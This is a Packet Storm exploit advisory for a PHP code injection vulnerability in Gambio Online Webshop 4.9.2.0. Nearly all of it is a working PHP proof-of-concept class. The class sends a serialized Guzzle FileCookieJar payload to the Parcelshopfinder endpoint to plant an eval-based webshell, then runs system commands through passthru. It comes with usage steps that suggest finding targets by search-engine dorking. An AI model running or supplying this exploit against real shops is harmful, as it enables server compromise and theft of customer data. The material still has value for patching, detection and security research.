Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.
c8f9e04f80ca5f409461edae51290f96dd6f04c7856de1b8c387b3a5757ea858=============================================================================================================================================
| # Title : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.gambio.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 85 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class GambioExploit {
private $targetUrl;
private $webshellName;
private $postParam;
private $getParam;
private $phpCmdFunction;
public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {
$this->targetUrl = $targetUrl;
$this->phpCmdFunction = $phpCmdFunction;
$this->webshellName = $webshellName ?: $this->randomString() . '.php';
$this->postParam = $this->randomString();
$this->getParam = $this->randomString();
}
// Random string generator
private function randomString($length = 8) {
return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);
}
// Function to send HTTP POST request
private function sendPostRequest($uri, $data) {
$url = $this->targetUrl . $uri;
$options = [
'http' => [
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
// Upload webshell to target
public function uploadWebshell() {
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
$finalPayload = base64_encode(serialize([
"GuzzleHttp\\Cookie\\FileCookieJar" => [
"cookies" => [
"GuzzleHttp\\Cookie\\SetCookie" => [
"data" => [
"Value" => $phpPayload,
"Domain" => "target.com",
"Path" => "/",
]
]
],
"filename" => $this->webshellName
]
]));
$this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [
'checkout_started' => 0,
'search' => $finalPayload,
'firstname' => 'test',
'lastname' => 'test',
]);
echo "Webshell uploaded to: {$this->webshellName}\n";
}
// Execute PHP payload
public function executePhp($cmd) {
$payload = base64_encode($cmd);
$this->sendPostRequest("/{$this->webshellName}", [
$this->postParam => $payload
]);
echo "Executed command via webshell: {$cmd}\n";
}
// Execute command
public function executeCommand($cmd) {
$payload = base64_encode($cmd);
$this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [
$this->postParam => $payload
]);
echo "Executed command: {$cmd}\n";
}
}
// Example Usage
$exploit = new GambioExploit('https://target.com');
$exploit->uploadWebshell();
$exploit->executeCommand('id');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed